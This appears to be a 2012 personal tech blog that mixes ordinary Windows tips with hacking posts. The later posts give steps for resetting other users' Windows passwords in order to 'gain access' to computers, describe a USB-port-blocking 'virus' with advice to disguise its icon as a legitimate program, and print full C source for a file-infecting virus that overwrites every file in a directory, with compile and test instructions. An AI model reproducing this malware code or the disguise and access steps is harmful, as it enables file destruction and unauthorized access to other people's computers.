Sunday, November 25, 2012

What happen If Microsoft Created iPad



It’s funny but reality and we have to accept it. Even in windows 7 (The most advanced Microsoft created operating system) crashes without any proper reasons. I got a GIF created by awesomegifs.com and I would like to share it with you guys. I hope, I am not making anyone annoyed. Have a look and enjoy!!!!
startrek-bluescreen



Decrypt Encrypted files In Windows XP

  1. Login as Administrator
  2. Go to Start/Run and type in cmd and click OK.
  3. At the prompt type cipher /r:Eagent and press enter
  4. This prompt will then display:
  5. Please type in the password to protect your .PFX file:
  6. Type in your Administrator password
  7. Re-confirm your Administrator password
  8. The prompt will then display
  9. Your .CER file was created successfully.
  10. Your .PFX file was created successfully.
  11. The Eagent.cer and Eagent.pfx files will be saved in the current directory that is shown at the command prompt. Example: The command prompt displays C:Documents and Settingsadmin> the two files are saved in the admin folder. (Forsecurity concerns, you should house the two files in your Administrator folder or on a floppy disk).
  12. Go to Start/Run and type in certmgr.msc and click OK. This will launch the Certificates Manager. Navigate to Personal and right click on the folder and select All Tasks/Import. The Certificate Import Wizard will appear. Click Next. Browse to the C:Documents and Settingsadmin folder. In the Open dialog box, change the Files of Type (at the bottom) to personal Information Exchange (*.pfx,*.P12). Select the file Eagent.pfx and click Open. Click Next. Type in your Administratorpassword (leave the two checkboxes blank) and click Next. Make sure the Radio button is active for the first option (Automatically select the certificate store based on the type of certifcate). Click Next. Click Finish. (You’ll receive a message that the import was successful). To confirm the import, close Certificates Manager and re-open it. Expand the Personal folder and you will see a new subfolder labeled Certificates. Expand that folder and you will see the new entry in the right side column. Close Certificate Manager.
  13. Go to Start/Run and type in secpol.msc and click OK. This will launch the LocalSecurity Policy. Expand the Public Key Policies folder and then right click on the Encrypted File System subfolder and select Add Data Recovery Agent… The Wizard will then display. Click Next. Click the Browse Folders… button. Browse to the C:Documents and Settingsadmin folder. Select the Eagent.cer file and click Open. (The wizard will display the status User_Unknown. That’s ok). Click Next. Click Finish. You will see a new entry in the right side column. Close the Local SecurityPolicy.
  14. You, the Administrator are now configured as the default Recovery Agent for All Encrypted files on the Local Machine.
  15. To Recover Encrypted files:
Scenario #1
If you have completed the above steps BEFORE an existing user encrypted his/her files, you can log in to your Administrator account and navigate to the encrypted file(s). Double click on the file(s) to view the contents.
Scenario #2
If you have completed the above steps AFTER an existing user has already encrypted his/her files, you must login to the applicable User’s User Account and then immediately logout. Next, login to your Administrator account and navigate to the encrypted file(s). Double click on the file(s) to view the contents.
Do not Delete or Rename a User’s account from which will want to Recover the Encrypted Files. You will not be able to de-crypt the files using the steps outlined above.


Change Hibernation settings in Windows 7


Enable and Disable Hibernation in Windows 7


Most easy and quick way to enable and disable hibernation in Windows7 is command line method. You have to start your CMD (Command Prompt) in administrator mode and issue a very simple and easy to remember command to enable or disablehibernation.
enable hibernationEnable Hibernation
powercfg /hibernate on
 
disable hibernationDisable Hibernation
powercfg /hibernate off

Windows 7 commands most widely used Commands


Windows 7: A comprehensive List of Commands

Today I like to share the windows commands of windows 7 (The latest windows family member). There are thousands of shortcut keys available to operate windows 7 but a list of most widely used keys are share as under;

List of Windows 7 Commands


Command / Shortcut KeysDescription

windows7logo+ Up ArrowIt is used to maximize the current window

windows7logo+ Left ArrowAdjusts the current window to the left side of the desktop

windows7logo+ Right ArrowAdjusts the current window to the right side of the desktop

windows7logo+ Down ArrowMinimizes the windows to the Task bar
windows7logo+ SpaceAll windows become transparent so you are able to see your desktop

windows7logo+ TShows the thumbnail preview of the running applications

windows7logo+ PAdjust the presentation options of the display on your computer or projector

windows7logo+ (+ / -) (Add/Minus)Launches the Magnifier which can be used to zoom in/zoom out

windows7logo+ FUsed to start the Windows Search
windows7logo+ XRun the Windows Mobility Center
windows7logo+ EOpen the Windows Explorer
windows7logo+ [number]Used to run the pinned applications on the taskbar, Windows + 1 will run the first pinned application on the task bar, similarly Windows + 2 will run the second pinned application and so on.

windows7logo+ TabLaunch the Windows Aero task switcher
windows7logo+ PauseLoad the system properties window
windows7logo+ Ctrl + FSearch for computers if you are on a network

windows7logo+ BShift the control to the System Tray icons one by one

windows7logo+ GCycle between the Gadgets on the screen
Alt + windows7logo + [number]Opens the jump list for the applicationswhich are pinned to the task bar

Alt + UpTakes you up a folder level in theWindows Explorer

Alt + DUsed to select the address bar.

Ctrl + Shift + Ncreate a new folder in the windows explorer

Ctrl + Shift + Click on icon [Task Bar]open a new instance of the particular application from the taskbar with administrator privileges.

Ctrl + Click on a grouped taskbar buttonCycle between the windows of the group

Ctrl + EscOpen Start Menu

Shift + Right-click on a folderAdd the command prompt option to the Folder

Shift + Right-click on a fileAdd the Copy As Path option in the right click-menu of the file

Shift + Right-click on a taskbar buttonDisplay the window menu for the specific taskbar application

Shift + Right-click on a grouped taskbar buttonLaunch the windows menu for the group

Shift + Click a Taskbar itemNew instance of the particularapplication on which clicked




Saturday, November 24, 2012

USB flash drive to protect your computer


Use your USB flash drive to protect your computer



Predator is a free tool that turns any USB flash drive into a key that you can use to lock or unlock your PC, preventing other people from gaining access to your computer in your absence.
Using Predator to protect your computer is both simple and fast. Just insert the drive you want to use and enter a password. Once it is running, use your PC as normal and then simply unplug the drive to lock it. Once it is removed, the keyboard and mouse are disabled and the screen darkens. No one will be able to use your computer. To unlock it, just reinsert the drive and keyboard and mouse are immediately released, and the display is restored.
It’s easier and faster than closing your Windows session, since you do not have to retype your password when you return.
Predator has some advanced features too to add to the security.

  • It records all security-related events in a log file: start, alarms, stop, so you will know if anyone has been trying to access your computer while you were away.

  • It frequently changes the security codes recorded on your USB drive. If an intruder manages to copy your stick, this copy will not work because the codes on your own stick will have changed in the meantime.

  • It disables the Windows task manager when you unplug the USB drive. Nobody can stop it with Ctrl-Alt-Del.

  • What if lock your computer and you lose your flash drive? When you start the software for the first time, you set a password that will unlock your session if your USB drive is not available.

  • It can sound an audible alarm if somebody enters an invalid password.

  • It can protect several PCs with the same USB flash drive, e.g. your home and office computers.



Access another user Account with Admin rights

Lost your Windows password? Here’s what you can do to get around



Due to the security features built into Windows XP, it is virtually impossible to get back into the system without the password.
You have several options to try and get around this problem.
If you have access to another user account with administrator rights, you can use that account to change the password of the account that is locked out. You can also use the default Administrator account that is built into Windows XP.
First you need to boot the system into Safe Mode.
  1. Restart your system.
  2. When you see the blue screen, press the ( F8 ) key about 3 times a second.
  3. You should get the Windows startup menu. Use the (Up or Down) arrow keys to highlight (SafeMode).
  4. Press (Enter) on (Safe Mode), then press (Enter) on (Windows XP).
  5. The system should boot to Safe Mode.
Once you are at the Account Log on Screen, click on the icon for the user account with administrator rights, or click on the icon for the administrators account.
Note: For Home the Administrator account isn’t normally shown & in Safe Mode you have to press Ctrl+Alt+Delete keys twice to show. For PRO you can do this in normal mode
When the system has booted to the desktop, use the following steps to change the accounts password.
  1. Click Start, Control Panel, Administrative Tools.
  2. Click Computer Management.
  3. Double click Local Users and Groups, double click the folder Users.
  4. Right click on the account name that is locked out, and click on Set Password.
  5. You may get a warning message about changing the password, simply click proceed.
  6. Leave the New Password box blank, also leave the Confirm Password box blank.
  7. Click OK, and OK again.
  8. Then close all Windows, reboot the system and try to log in.
There are also applications that can recover the password for you.
If the above information does not help in recovering the password, the only option left is to format the hard drive then reinstall Windows and the system software.


Friday, November 23, 2012

Professional ASP.NET 4 in C# and VB

Professional ASP.NET 4 in C# and VB

Professional ASP.NET 4 in C# and VB

Professional JavaScript for Web Developers

Professional JavaScript for Web Developers, 3rd Edition

Professional JavaScript for Web Developers, 3rd Edition



Tuesday, November 13, 2012

How to Hack Windows Administrator Password


How to Hack Windows Admin Password
This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So, if you are somewhat in a same kind of situation, here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer.
You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features:
  • You do not need to know the old password to set a new one.
  • This tool can detect and unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it Works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file calledsam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence, it is necessary that you boot off your computer and access this sam file via the boot menu. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below:
It is recommended that you download the CD version of the tool since the floppy drive is outdated or doesn’t exist in today’s computer. After the download, you’ll get a bootable image which you need to burn it onto a blank CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another Simple Way to Reset Non-Administrator Account Passwords:

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task:
  1. Open the command prompt (Start -> Run -> type cmd -> Enter)
  2. Now type net user and hit Enter
  3. Now the system will show you a list of user accounts on the computer. Say for example, you need to reset the password of the account by name John, then do as follows:
  4. Type net user John * and hit Enter. Now, the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So, in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

Disable USB Ports with Virus Program


A Virus Program to Disable USB Ports









In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.


Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

I hope you like this post. Please pass your comments.


How to create virus file


How to Create a Computer Virus?











This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
  
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE